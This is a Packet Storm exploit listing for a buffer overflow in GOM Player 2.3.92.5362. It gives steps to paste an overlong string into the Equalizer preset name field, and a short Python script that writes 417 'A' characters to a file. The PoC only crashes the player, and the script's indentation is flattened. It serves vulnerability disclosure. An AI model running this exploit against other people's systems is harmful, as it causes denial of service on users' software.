Lucene search

K
packetstormYehia ElghalyPACKETSTORM:176395
HistoryJan 08, 2024 - 12:00 a.m.

Gom Player 2.3.92.5362 Buffer Overflow

2024-01-0800:00:00
Yehia Elghaly
packetstormsecurity.com
64
gom player
buffer overflow
poc
security vulnerability
windows 7
windows 10
exploit

7.4 High

AI Score

Confidence

Low

`# Exploit Title: Gom Player 2.3.92.5362 - Buffer Overflow (PoC)  
# Discovered by: Yehia Elghaly (Mrvar0x)  
# Discovered Date: 04.01.2024  
# Vendor Homepage: https://www.gomlab.com/en  
# Tested Version: 2.3.92.5362  
# Tested on: Windows 7, Windows 10  
  
# - Open GOM Player  
# - Click on the settings  
# - From the menu, select Audio --> Equalizer  
# - Click on the plus sign to go to the "Add EQ preset" screen  
# - Copy the contents of exploit.txt and paste it into name box, then click OK  
# - Crashed!  
  
  
  
#!/usr/bin/python  
  
exploit = 'A' * 417  
  
try:  
file = open("exploit.txt","w")  
file.write(exploit)  
file.close()  
  
print("POC is created")  
except:  
print("POC is not created")  
`

7.4 High

AI Score

Confidence

Low